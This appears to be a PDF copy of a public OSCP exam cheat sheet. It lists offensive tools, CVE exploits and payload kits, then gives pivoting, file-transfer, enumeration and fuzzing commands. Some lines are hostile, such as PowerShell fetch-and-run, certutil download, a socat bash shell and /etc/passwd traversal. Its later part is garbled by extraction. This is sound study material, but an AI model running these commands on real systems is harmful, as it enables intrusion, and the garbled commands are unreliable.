Cismcissp Sheetcheet

Uploaded by

nizamuddin.p
OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 1 of 128

OSCP Cheat Sheet

Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP).

Since this little project gets more and more attention, I decided to update it as often as possible to focus on more helpful and absolutely necessary commands for the exam.

Feel free to submit a pull request or reach out to me on Twitter for suggestions. Every help or hint is appreciated!

DISCLAIMER: A guy on Twitter got a point. Automatic exploitation tools like sqlmap are prohibited to use in the exam. The same goes for the automatic exploitation functionality of LinPEAS. I am not keeping track of current guidelines related to those tools. For that I want to point out that I am not responsible if anybody uses a tool without double checking the latest exam restrictions and fails the exam. Inform yourself before taking the exam! I removed sqlmap because of the reasons above but Metasploit is still part of the guide because you can use it for one specific module.

Thank you Muztahidul Tanim for making me aware and to Yeeb for the resources.

Here are the links to the OSCP Exam Guide and the discussion about LinPEAS. I hope this helps.

END NOTE: This repository will also try to cover as much as possible of the tools required for the proving grounds boxes.

Thank you for reading.

Table of Contents

- Basics
- Information Gathering
- Vulnerability Analysis
- Web Application Analysis
- Password Attacks
- Reverse Engineering
- Exploitation Tools
- Post Exploitation
- Exploit Databases
- CVEs
- Payloads
- Wordlists
- Social Media Resources
- Commands
  - Basics
    - curl
    - Chisel
    - File Transfer
    - FTP
    - Kerberos
    - Ligolo-ng
    - Linux
    - Microsoft Windows
    - PHP Webserver
    - Ping
    - Python Webserver
    - RDP
    - showmount
    - smbclient
    - socat
    - SSH
    - Time and Date
    - Tmux
    - Upgrading Shells
    - VirtualBox
    - virtualenv
  - Information Gathering
    - memcached
    - NetBIOS
    - Nmap
    - Port Scanning
    - snmpwalk
  - Web Application Analysis
    - Burp Suite
    - cadaver
    - Cross-Site Scripting (XSS)
    - ffuf
    - Gobuster
    - GitTools
    - Local File Inclusion (LFI)
    - PDF PHP Inclusion
    - PHP Upload Filter Bypasses
    - PHP Filter Chain Generator
    - PHP Generic Gadget Chains (PHPGGC)
    - Server-Side Request Forgery (SSRF)
    - Server-Side Template Injection (SSTI)
    - Upload Vulnerabilities
    - wfuzz
    - WPScan
    - XML External Entity (XXE)
  - Database Analysis
    - MongoDB
    - MSSQL
    - MySQL
    - NoSQL Injection
    - PostgreSQL
    - Redis
    - sqlcmd
    - SQL Injection
    - SQL Truncation Attack
    - sqlite3
    - sqsh
  - Password Attacks
    - CrackMapExec
    - fcrack
    - hashcat
    - Hydra
    - John
    - Kerbrute
    - LaZagne
    - mimikatz
    - pypykatz
  - Exploitation Tools
    - ImageTragick
    - MSL / Polyglot Attack
    - Metasploit
  - Post Exploitation
    - Active Directory Certificate Services (AD CS)
    - ADCSTemplate
    - BloodHound
    - BloodHound Python
    - bloodyAD
    - Certify
    - Certipy
    - enum4linux-ng
    - Evil-WinRM
    - Impacket
    - JAWS
    - Kerberos
    - ldapsearch
    - Linux
    - Microsoft Windows
    - PassTheCert
    - PKINITtools
    - Port Scanning
    - powercat
    - Powermad
    - PowerShell
    - pwncat
    - rpcclient
    - Rubeus
    - RunasCs
    - smbpasswd
    - winexe
  - CVE
    - CVE-2014-6271: Shellshock RCE PoC
    - CVE-2016-1531: exim LPE
    - CVE-2019-14287: Sudo Bypass
    - CVE-2020-1472: ZeroLogon PE
    - CVE-2021-3156: Sudo / sudoedit LPE
    - CVE-2021-44228: Log4Shell RCE (0-day)
    - CVE-2022-0847: Dirty Pipe LPE
    - CVE-2022-22963: Spring4Shell RCE (0-day)
    - CVE-2022-30190: MS-MSDT Follina RCE
    - CVE-2022-31214: Firejail LPE
    - CVE-2023-21746: Windows NTLM EoP LocalPotato LPE
    - CVE-2023-22809: Sudo Bypass
    - CVE-2023-23397: Microsoft Outlook (Click-to-Run) PE (0-day) (PowerShell Implementation)
    - CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)
    - CVE-2023-4911: Looney Tunables LPE
    - GodPotato LPE
    - Juicy Potato LPE
    - JuicyPotatoNG LPE
    - MySQL 4.x/5.0 User-Defined Function (UDF) Dynamic Library (2) LPE
    - PrintSpoofer LPE
    - SharpEfsPotato LPE
    - Shocker Container Escape
  - Payloads
    - Donut
    - Exiftool
    - GhostScript
    - nishang
    - Reverse Shells
    - ScareCrow
    - Shikata Ga Nai
    - Web Shells
    - ysoserial
  - Templates
    - ASPX Web Shell
    - Bad YAML
    - Exploit Skeleton Python Script
    - JSON POST Request
    - Python Pickle RCE
    - Python Redirect for SSRF
    - Python Web Request
    - XML External Entity (XXE)

Basics

| Name | URL |
| --- | --- |
| Chisel | https://tinyurl.com/z6yl32k |
| CyberChef | https://tinyurl.com/h8hf4uc |
| Swaks | https://tinyurl.com/ytqrw96w |

Information Gathering

| Name | URL |
| --- | --- |
| Nmap | https://tinyurl.com/9og4655 |

Vulnerability Analysis

| Name | URL |
| --- | --- |
| nikto | https://tinyurl.com/pu28ujz |
| Sparta | https://tinyurl.com/n24hfeb |

Web Application Analysis

| Name | URL |
| --- | --- |
| ffuf | https://tinyurl.com/2e5nyvw8 |
| fpmvuln | https://tinyurl.com/ys38zw8w |
| Gobuster | https://tinyurl.com/y2bqjxcj |
| JSON Web Tokens | https://tinyurl.com/y3xmvqup |
| JWT_Tool | https://tinyurl.com/2ry85jf7 |
| Leaky Paths | https://tinyurl.com/yman7qqf |
| PayloadsAllTheThings | https://tinyurl.com/y4ezgl4c |
| PHP Filter Chain Generator | https://tinyurl.com/yv3gjun7 |
| PHPGGC | https://tinyurl.com/yaz8sz94 |
| Spose | https://tinyurl.com/ynlscezd |
| Wfuzz | https://tinyurl.com/psuc9d9 |
| WhatWeb | https://tinyurl.com/7u2t8h9 |
| WPScan | https://tinyurl.com/kc9zypf |
| ysoserial | https://tinyurl.com/q4x2gct |

Password Attacks

| Name | URL |
| --- | --- |
| CrackMapExec | https://tinyurl.com/ngzqxs2 |
| Default Credentials Cheat Sheet | https://tinyurl.com/2mbz9hdk |
| Firefox Decrypt | https://tinyurl.com/y5dzosvz |
| hashcat | https://tinyurl.com/ytbkp2hp |
| Hydra | https://tinyurl.com/podb3lg |
| John | https://tinyurl.com/2yquyysj |
| keepass-dump-masterkey | https://tinyurl.com/ypwg5xh2 |
| KeePwn | https://tinyurl.com/yq8uco5o |
| Kerbrute | https://tinyurl.com/y66kz8ad |
| LaZagne | https://tinyurl.com/m9k4zzr |
| mimikatz | https://tinyurl.com/qdf539r |
| Patator | https://tinyurl.com/onz6ly9 |
| pypykatz | https://tinyurl.com/yxp3rds4 |
| RsaCtfTool | https://tinyurl.com/ybvm97ey |
| SprayingToolkit | https://tinyurl.com/2yzbkw8x |

Reverse Engineering

| Name | URL |
| --- | --- |
| AvaloniaILSpy | https://tinyurl.com/ywez6rvy |
| binwalk | https://tinyurl.com/ycgf2rn2 |
| cutter | https://tinyurl.com/ypy6duxm |
| dnSpy | https://tinyurl.com/y7k9r2zy |
| GEF | https://tinyurl.com/nmtak2c |
| ghidra | https://tinyurl.com/y5ojpa5p |
| ImHex | https://tinyurl.com/y32bgpm9 |
| JD-GUI | https://tinyurl.com/yo3wyung |
| peda | https://tinyurl.com/ohx63nb |
| pwndbg | https://tinyurl.com/z5np3re |
| Radare2 | https://tinyurl.com/y3tvmeoq |

Exploitation Tools

| Name | URL |
| --- | --- |
| Evil-WinRM | https://tinyurl.com/yyj7vkrg |
| ImageTragick | https://tinyurl.com/ycm9mqcs |
| Metasploit | https://tinyurl.com/d3kqjuo |
| MSL / Polyglot Attack | https://tinyurl.com/y3qzu9oa |

Post Exploitation

| Name | URL |
| --- | --- |
| ADCSKiller - An ADCS Exploitation Automation Tool | https://tinyurl.com/2xa2la3z |
| ADCSTemplate | https://tinyurl.com/yp89grdv |
| BloodHound Docker | https://tinyurl.com/ypzjy87j |
| BloodHound | https://tinyurl.com/y2s37jeg |
| BloodHound | https://tinyurl.com/ymc3svna |
| BloodHound Python | https://tinyurl.com/ybsrj8pt |
| Certify | https://tinyurl.com/267b27re |
| Certipy | https://tinyurl.com/2c3ltmmt |
| enum4linux-ng | https://tinyurl.com/ymbmo3kr |
| Ghostpack-CompiledBinaries | https://tinyurl.com/ym88zaxv |
| GTFOBins | https://tinyurl.com/yccgv6ks |
| Impacket | https://tinyurl.com/243wq45x |
| Impacket Static Binaries | https://tinyurl.com/ya5yzamu |
| JAWS | https://tinyurl.com/223k2krg |
| KrbRelay | https://tinyurl.com/yw8bodx9 |
| KrbRelayUp | https://tinyurl.com/2746ujpv |
| Krbrelayx | https://tinyurl.com/2bk3fjy5 |
| LAPSDumper | https://tinyurl.com/287cdjlq |
| LES | https://tinyurl.com/yszcubjb |
| LinEnum | https://tinyurl.com/lxhk642 |
| LOLBAS | https://tinyurl.com/ypalagrk |
| lsassy | https://tinyurl.com/ygbh2wp6 |

| CVE | Description | URL |
| --- | --- | --- |
| CVE-2022-22963 | Spring4Shell RCE (0-day) | https://tinyurl.com/ytkpunmc |
| CVE-2022-23119, CVE-2022-23120 | Trend Micro Deep Security Agent for Linux Arbitrary File Read | https://tinyurl.com/yupgsjay |
| CVE-2022-24715 | Icinga Web 2 Authenticated Remote Code Execution RCE | https://tinyurl.com/ypsf9wrp |
| CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://tinyurl.com/yns7jz6s |
| CVE-2022-30190 | MS-MSDT Follina Attack Vector RCE | https://tinyurl.com/23hee338 |
| CVE-2022-30190 | MS-MSDT Follina RCE PoC | https://tinyurl.com/ykqytpee |
| CVE-2022-30190 | MS-MSDT Follina RCE (Python Implementation) | https://tinyurl.com/ynzqbrz6 |
| CVE-2022-31214 | Firejail / Firejoin LPE | https://tinyurl.com/yl9bg39s |
| CVE-2022-31214 | Firejail / Firejoin LPE | https://tinyurl.com/yo2v7szj |
| CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://tinyurl.com/yvutxoye |
| CVE-2022-46169 | Cacti Authentication Bypass RCE | https://tinyurl.com/ymfqxc7f |
| CVE-2023-21716 | CVE-2023-21716: Microsoft Word RTF Font Table Heap Corruption RCE PoC (Python Implementation) | https://tinyurl.com/ylj6smyx |
| CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://tinyurl.com/ysjn82mr |
| CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://tinyurl.com/yrzdgxmy |
| CVE-2023-21817 | Kerberos Unlock LPE PoC | https://tinyurl.com/yqtw4ftq |
| CVE-2023-22809 | sudoedit LPE | https://tinyurl.com/yn22klk9 |
| CVE-2023-23397 | Microsoft Outlook (Click-to-Run) PE (0-day) | https://tinyurl.com/yt84jkf2 |
| CVE-2023-23397 | Microsoft Outlook (Click-to-Run) PE (0-day) (PowerShell Implementation) | https://tinyurl.com/ytw4r8m7 |
| CVE-2023-23397 | Microsoft Outlook (Click-to-Run) PE (0-day) (Python Implementation) | https://tinyurl.com/yr99sezo |
| CVE-2023-25690 | Apache mod_proxy HTTP Request Smuggling PoC | https://tinyurl.com/yowrwnad |
| CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://tinyurl.com/yn7zxx2f |
| CVE-2023-32233 | Use-After-Free in Netfilter nf_tables LPE | https://tinyurl.com/yqp4wdzb |
| CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://tinyurl.com/2x529wjt |
| CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://tinyurl.com/yod47zs3 |
| n/a | dompdf RCE (0-day) | https://tinyurl.com/yuxao3cz |
| n/a | dompdf XSS to RCE (0-day) | https://tinyurl.com/ykvvdvw3 |
| n/a | StorSvc LPE | https://tinyurl.com/yoszh6zz |
| n/a | DCOMPotato LPE | https://tinyurl.com/ywlpnlof |
| n/a | GenericPotato LPE | https://tinyurl.com/yus69d92 |
| n/a | GodPotato LPE | https://tinyurl.com/2a3qo93f |
| n/a | JuicyPotato LPE | https://tinyurl.com/ybokbztq |
| n/a | Juice-PotatoNG LPE | https://tinyurl.com/2dq9ve6n |
| n/a | MultiPotato LPE | https://tinyurl.com/25ykdfoc |
| n/a | RemotePotato0 PE | https://tinyurl.com/yfbvx5ex |
| n/a | RoguePotato LPE | https://tinyurl.com/2863etm8 |
| n/a | RottenPotatoNG LPE | https://tinyurl.com/ya4shaht |
| n/a | SharpEfsPotato LPE | https://tinyurl.com/ymoyb85q |
| n/a | SweetPotato LPE | https://tinyurl.com/26gksp5m |
| n/a | SweetPotato LPE | https://tinyurl.com/ypogekl9 |
| n/a | S4UTomato LPE | https://tinyurl.com/ylvah6ln |
| n/a | PrintSpoofer LPE (1) | https://tinyurl.com/ypcgaqhn |
| n/a | PrintSpoofer LPE (2) | https://tinyurl.com/yw7rvx9n |
| n/a | Shocker Container Escape | https://tinyurl.com/k9h45xr |
| n/a | SystemNightmare PE | https://tinyurl.com/yhty6n9d |
| n/a | NoFilter LPE | https://tinyurl.com/ywx49muw |
| n/a | OfflineSAM LPE | https://tinyurl.com/ypzgcnjg |
| n/a | OfflineAddAdmin2 LPE | https://tinyurl.com/ypzgcnjg/OfflineAddAdmin2 |
| n/a | Kernelhub | https://tinyurl.com/yso389vq |
| n/a | Windows Exploits | https://tinyurl.com/yyhlsjdm |
| n/a | Pre-compiled Windows Exploits | https://tinyurl.com/ya95cf93 |

Payloads

| Name | URL |
| --- | --- |
| AMSI.fail | https://tinyurl.com/yv44ju36 |
| Donut | https://tinyurl.com/26tw6g8p |
| Freeze | https://tinyurl.com/2djf5w9d |
| hoaxshell | https://tinyurl.com/295mlft5 |
| Invoke-Obfuscation | https://tinyurl.com/lr4ekst |
| marshalsec | https://tinyurl.com/yb7bsz26 |
| nishang | https://tinyurl.com/y22f77lj |
| Payload Box | https://tinyurl.com/ykdy65tn |
| PayloadsAllTheThings | https://tinyurl.com/y4ezgl4c |
| phpggc | https://tinyurl.com/yaz8sz94 |
| PHP-Reverse-Shell | https://tinyurl.com/ysl8hdnj |
| PowerLine | https://tinyurl.com/yp3lzx7n |
| PowerShell Encoder (CyberChef) | Recipe for encoding PowerShell Payloads for Windows: https://tinyurl.com/ytrnyml6#recipe=Encode_text('UTF16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D') |
| Raikia's Hub Powershell Encoder | https://tinyurl.com/y3zhk99t |
| ScareCrow | https://tinyurl.com/y2467n9h |
| Shikata Ga Nai | https://tinyurl.com/y9b9hs4z |
| unicorn | https://tinyurl.com/p6kfz6k |
| Veil | https://tinyurl.com/ycheggz2 |
| webshell | https://tinyurl.com/y8m8pbyx |
| Web-Shells | https://tinyurl.com/ylm8lwaf |
| woodpecker | https://tinyurl.com/y3opm9dq |
| ysoserial | https://tinyurl.com/q4x2gct |
| ysoserial.net | https://tinyurl.com/yyejhaeu |

Wordlists

| Name | URL |
| --- | --- |
| bopscrk | https://tinyurl.com/ylkz2jxh |
| CeWL | https://tinyurl.com/ymq4a4q5 |
| COOK | https://tinyurl.com/yww7z4r9 |
| CUPP | https://tinyurl.com/y75okmhy |
| Kerberos Username Enumeration | https://tinyurl.com/ykb3hbzh |
| SecLists | https://tinyurl.com/luzosh8 |

Social Media Resources

| Name | URL |
| --- | --- |
| IppSec (YouTube) | https://tinyurl.com/y8qpg2ll |
| IppSec.rocks | https://tinyurl.com/yo49epz3# |
| 0xdf | https://tinyurl.com/ytap82my |
| HackTricks | https://tinyurl.com/2gzgwhv4 |
| Hacking Articles | https://tinyurl.com/yn8wokj3 |
| Rana Khalil | https://tinyurl.com/2onufexo |

Commands

Basics

curl

    curl -v http://                                               // verbose output
    curl -X POST http://                                          // use POST method
    curl -X PUT http://                                           // use PUT method
    curl --path-as-is http:///../../../../../../etc/passwd        // use --path-as-is to handle /../ or /./ in the given URL
    curl --proxy https://tinyurl.com/hdorn          // use proxy
    curl -F myFile=@ http://                                      // file upload
    curl${IFS}/                                                   // Internal Field Separator (IFS) example

Chisel

Reverse Pivot

    ./chisel server -p 9002 -reverse -v
    ./chisel client :9002 R:3000:127.0.0.1:3000

SOCKS5 / Proxychains Configuration

    ./chisel server -p 9002 -reverse -v
    ./chisel client :9002 R:socks

File Transfer

Certutil

    certutil -urlcache -split -f "http:///"

Netcat

    nc -lnvp <
    nc >

Impacket

    sudo impacket-smbserver ./
    sudo impacket-smbserver . -smb2support
    copy * \\\

PowerShell

    iwr / -o
    IEX(IWR http:///) -UseBasicParsing
    powershell -command Invoke-WebRequest -Uri http://:/ -Outfile C:\\temp\\

Bash only

wget version

Paste directly to the shell.

    function __wget() {
        : ${DEBUG:=0}
        local URL=$1
        local tag="Connection: close"
        local mark=0

        if [ -z "${URL}" ]; then
            printf "Usage: %s \"URL\" [e.g.: %s https://tinyurl.com/ynpjv2wt]" \
                   "${FUNCNAME[0]}" "${FUNCNAME[0]}"
            return 1;
        fi
        # split the URL into protocol, host[:port] and path
        read proto server path <<<$(echo ${URL//// })
        DOC=/${path// //}
        HOST=${server//:*}
        PORT=${server//*:}
        # no explicit port in the URL: default to 80
        [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
        [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST PORT=$PORT DOC=$DOC"

        # open a TCP connection on file descriptor 3 and send the request
        exec 3<>/dev/tcp/${HOST}/$PORT
        echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
        # print everything after the "Connection: close" response header
        while read line; do
            [[ $mark -eq 1 ]] && echo $line
            if [[ "${line}" =~ "${tag}" ]]; then
                mark=1
            fi
        done <&3
        exec 3>&-
    }

    __wget http:///

curl version

    function __curl() {
        # split the URL into protocol, host[:port] and path
        read proto server path <<<$(echo ${1//// })
        DOC=/${path// //}
        HOST=${server//:*}
        PORT=${server//*:}
        # no explicit port in the URL: default to 80
        [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

        exec 3<>/dev/tcp/${HOST}/$PORT
        echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
        # skip the response headers, then pass the body through unchanged
        (while read line; do
            [[ "$line" == $'\r' ]] && break
        done && cat) <&3
        exec 3>&-
    }

    __curl http:/// >

FTP

    ftp
    wget -r ftp://anonymous:anonymous@

Kerberos

    sudo apt-get install krb5-kdc

    impacket-getTGT /:''
    export KRB5CCNAME=.ccache
    export KRB5CCNAME='realpath .ccache'

    /etc/krb5.conf                             // kerberos configuration file location
    kinit                                      // creating ticket request
    klist                                      // show available kerberos tickets
    kdestroy                                   // delete cached kerberos tickets
    .k5login                                   // holds kerberos principals for login (place in home directory)
    krb5.keytab                                // "key table" file for one or more principals
    kadmin                                     // kerberos administration console
    add_principal                              // add a new user to a keytab file
    ksu                                        // executes a command with kerberos authentication
    klist -k /etc/krb5.keytab                  // lists keytab file
    kadmin -p kadmin/ -k -t /etc/krb5.keytab   // enables editing of the keytab file

Ligolo-ng

    https://tinyurl.com/25rtqzlc

Download Proxy and Agent

    wget https://tinyurl.com/25rtqzlc/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz
    wget https://tinyurl.com/25rtqzlc/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

Prepare Tunnel Interface

    sudo ip tuntap add user $(whoami) mode tun ligolo
    sudo ip link set ligolo up

Setup Proxy on Attacker Machine

    ./proxy -laddr :443 -selfcert

Setup Agent on Target Machine

    ./agent -connect :443 -ignore-cert

Session

    ligolo-ng » session
    [Agent : user@target] » ifconfig
    sudo ip r add 172.16.1.0/24 dev ligolo
    [Agent : user@target] » start

Linux

CentOS

    doas -u /bin/sh

Environment Variables

    export PATH=`pwd`:$PATH

gcc

    gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit
    i686-w64-mingw32-gcc -o main32.exe main.c
    x86_64-w64-mingw32-gcc -o main64.exe main.c

getfacl

    getfacl

iconv

    echo "" | iconv -t UTF-16LE | base64 -w 0
    echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
    iconv -f ASCII -t UTF-16LE .txt | base64 | tr -d "\n"

vi

    :w !sudo tee %    # save file with elevated privileges without exiting

Windows Command Formatting

    echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0

Microsoft Windows

dir

    dir flag* /s /p
    dir /s /b *.log

PHP Webserver

    sudo php -S 127.0.0.1:80

Ping

    ping -c 1
    ping -n 1

Python Webserver

    sudo python -m SimpleHTTPServer 80
    sudo python3 -m http.server 80

RDP

    xfreerdp /v: /u: /p: /dynamic-resolution +clipboard
    xfreerdp /v: /u: /d: /pth:'' /dynamic-resolution +clipboard
    rdesktop

showmount

    /usr/sbin/showmount -e
    sudo showmount -e
    chown root:root sid-shell; chmod +s sid-shell

smbclient

    smbclient -L \\\ -N
    smbclient -L /// -N
    smbclient -L ///// -N
    smbclient -U "" -L \\\\\\
    smbclient -L //// -U %
    smbclient ///SYSVOL -U %
    smbclient "\\\\\"
    smbclient \\\\\\ -U '' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
    smbclient --no-pass ///
    mount.cifs /// /mnt/remote
    guestmount --add '//' --inspector --ro /mnt/ -v

Download multiple files at once

    mask""
    recurse ON
    prompt OFF
    mget *

Upload multiple Files at once

    recurse ON
    prompt OFF
    mput *

socat

    socat TCP-LISTEN:,fork TCP::

    socat file:`tty`,raw,echo=0 tcp-listen:
    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::

    socat tcp-listen:5986,reuseaddr,fork tcp::9002
    socat tcp-listen:9002,reuseaddr,fork tcp:192.168.122.228:5968 &

SSH

    ssh user@ -oKexAlgorithms=+diffie-hellman-group1-sha1

    ssh -R 8080::80
    ssh -L 8000:127.0.0.1:8000 @
    ssh -N -L 1234:127.0.0.1:1234 @

    ssh -L 80::80
    ssh -L 127.0.0.1:80::80
    ssh -L 80:localhost:80

Time and Date

Get the Server Time

    sudo nmap -sU -p 123 --script ntp-info

Stop virtualbox-guest-utils to stop syncing Time

    sudo /etc/init.d/virtualbox-guest-utils stop

Stop systemd-timesyncd to sync Time manually

    sudo systemctl stop systemd-timesyncd

Disable automatic Sync

    sudo systemctl disable --now chronyd

Options to set the Date and Time

    sudo net time -c
    sudo net time set -S
    sudo net time \\ /set /y
    sudo ntpdate
    sudo ntpdate -s
    sudo ntpdate -b -u
    sudo timedatectl set-timezone UTC
    sudo timedatectl list-timezones
    sudo timedatectl set-timezone '/'
    sudo timedatectl set-time 15:58:30
    sudo timedatectl set-time '2015-11-20 16:14:50'
    sudo timedatectl set-local-rtc 1

Keep in Sync with a Server

    while [ 1 ]; do sudo ntpdate ;done

Tmux

    ctrl b + w          # show windows
    ctrl + "            # split window horizontal
    ctrl + %            # split window vertical
    ctrl + ,            # rename window
    ctrl + {            # flip window
    ctrl + }            # flip window
    ctrl + spacebar     # switch pane layout

Copy & Paste

    :setw -g mode-keys vi
    ctrl b + [
    space
    enter
    ctrl b + ]

Search

    ctrl b + [      # enter copy
    ctrl + /        # enter search while within copy mode for vi mode
    n               # search next
    shift + n       # reverse search

Logging

    ctrl b
    shift + P    # start / stop

Save Output

    ctrl b + :
    capture-pane -S -
    ctrl b + :
    save-buffer .txt

Upgrading Shells

    python -c 'import pty;pty.spawn("/bin/bash")'
    python3 -c 'import pty;pty.spawn("/bin/bash")'

    ctrl + z
    stty raw -echo
    fg
    Enter
    Enter
    export XTERM=xterm

Alternatively:

    script -q /dev/null -c bash
    /usr/bin/script -qc /bin/bash /dev/null

Oneliner

    stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Fixing Staircase Effect

    env reset

or

    stty onlcr

VirtualBox

    sudo pkill VBoxClient && VBoxClient --clipboard

virtualenv

    sudo apt-get install virtualenv
    virtualenv -p python2.7 venv
    . venv/bin/activate

    python.exe -m pip install virtualenv
    python.exe -m virtualenv venv
    venv\Scripts\activate

Information Gathering

memcached

    https://tinyurl.com/yscq43ox

memcrashed / 11211/UDP

    npm install -g memcached-cli
    memcached-cli :@:11211
    echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211

    STAT pid 21357
    STAT uptime 41557034
    STAT time 1519734962

    sudo nmap -p 11211 -sU -sS --script memcached-info

    stats items
    stats cachedump 1 0
    get link
    get file
    get user
    get passwd
    get account
    get username
    get password

NetBIOS

    nbtscan
    nmblookup -A

Nmap

    sudo nmap -A -T4 -sC -sV -p-
    sudo nmap -sV -sU
    sudo nmap -A -T4 -sC -sV --script vuln
    sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery
    sudo nmap -sC -sV -p- --scan-delay 5s
    sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
    ls -lh /usr/share/nmap/scripts/*ssh*
    locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb

Port Scanning

    for p in {1..65535}; do nc -vn $p -w 1 -z & done 2> .txt

    export ip=; for port in $(seq 1 65535); do timeout 0.01 bash -c " /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done

snmpwalk

    snmpwalk -c public -v1
    snmpwalk -v2c -c public 1.3.6.1.2.1.4.34.1.3
    snmpwalk -v2c -c public .1
    snmpwalk -v2c -c public nsExtendObjects
    snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.25
    snmpwalk -c public -v1 1.3.6.1.2.1.25.4.2.1.2
    snmpwalk -c public -v1 .1.3.6.1.2.1.1.5
    snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.3.1.1
    snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.27
    snmpwalk -c public -v1 1.3.6.1.2.1.6.13.1.3
    snmpwalk -c public -v1 1.3.6.1.2.1.25.6.3.1.2

Web Application Analysis

Burp Suite

    Ctrl+r          // Sending request to repeater
    Ctrl+i          // Sending request to intruder
    Ctrl+Shift+b    // base64 encoding
    Ctrl+Shift+u    // URL decoding

Set Proxy Environment Variables

    export HTTP_PROXY=https://tinyurl.com/3fjzq
    export HTTPS_PROXY=https://tinyurl.com/4mk9oz

cadaver

    cadaver http:////

    dav://> cd C
    dav://C/> ls
    dav://C/> put

Cross-Site Scripting (XSS)
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 35 of 128 ffuf API Fuzzing Searching for LFI
Fuzzing with PHP Session ID Recursion File Extensions Rate Limiting Virtual Host Discovery ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -mc all ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -mc all ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http:/// -H "Host: FUZZ." -fs
185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u
http:///backups/backup_2020070416FUZZ.zip ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac
-t 250 -fc 400,404,412 ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u
http:///admin../admin_staging/index.php?page=FUZZ -fs 15349 ffuf -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u
"http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644 ffuf -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u
http:///cd/basic/FUZZ -recursion ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-
list-2.3-small.txt -u http:///cd/ext/logs/FUZZ -e .log ffuf -w /usr/share/wordlists/seclists/Discovery/Web-
Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http:///cd/rate/FUZZ -mc 200,429 OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 36 of 128 Massive File Extension Discovery
GitTools ./gitdumper.sh http:///.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/
/PATH/TO/FOLDER/ Gobuster Common File Extensions txt,bak,php,html,js,asp,aspx Common Picture
Extensions png,jpg,jpeg,gif,bmp POST Requests ffuf -w
/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u
http:// -fs 1495 ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc
200,204,301,302,307,401,403,500 -ic -
e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.do
t,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.pht
ml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.
xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip -e // extended mode that renders the full url -k // skip ssl certificate
validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --
wildcard // set wildcard option $ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-
medium.txt -u http:/// $ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x
php $ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200 $ gobuster
